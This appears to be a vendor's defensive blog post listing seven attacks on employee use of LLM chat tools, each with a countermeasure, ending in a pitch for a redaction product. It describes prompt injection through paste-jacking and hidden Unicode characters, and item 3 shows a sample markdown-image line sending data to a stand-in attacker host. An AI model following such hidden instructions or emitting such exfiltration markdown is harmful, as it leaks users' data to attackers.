Technical

Red-Team Your Prompt Workflow: 7 Attacks Worth Simulating

A small, running list of adversary techniques that specifically target the seam between your employees and the LLM. Use it as a red-team runbook.

PromptShielder Security Team· Applied cryptography & privacy engineering August 12, 2025 7 min read

1. Paste-jacking

Attacker publishes a webpage. Employee copies a snippet. The clipboard actually contains a longer payload with hidden instructions. Employee pastes into ChatGPT. Model follows the hidden instructions. Countermeasure: scrub zero-width and RTL-override characters on paste; visually diff long pastes.

2. Invisible-character injection

Bidirectional overrides (U+202A–U+202E) and zero-width joiners can hide instructions inside otherwise innocent text. PromptShielder strips these on paste; you should verify your tools do too.

3. Response exfiltration via markdown image

A prompt-injected model returns `![](https://evil/?data=...)`. When the browser renders the markdown, it makes a GET request that ships the exfil payload. Countermeasure: sanitise or render markdown in a sandboxed context.

4. Extension abuse

A benign-looking browser extension with page-content permission reads every prompt and every response. Countermeasure: extension inventory, page-content permission audit, redaction-before-send so the extension only sees tokens.

5. Screenshot leakage

OS-level screenshot tools sync to a personal cloud. Compliance surface expands without anyone noticing. Countermeasure: policy + endpoint DLP + a habit of redacting before screenshotting.

6. Clipboard scraping

Malware reads the clipboard every 500 ms. If you copy a redacted prompt and paste it into ChatGPT, only the redacted form is exposed. If you copy the raw one, everything is. Countermeasure: only copy the redacted output; auto-clear clipboard on a timer.

7. Prompt-history mining

An attacker with account access reads the target's ChatGPT history. Countermeasure: chat history off, or redact-before-send so history contains only tokens.

Frequently asked

Are these OWASP-mapped?+

Most fall under LLM01 (Prompt Injection), LLM06 (Sensitive Information Disclosure) or LLM08 (Excessive Agency).

Sources
TechnicalGovernance
Try PromptShielder

Redact prompts before they leave your browser.

Free to try. Nothing is sent to a server. Ever.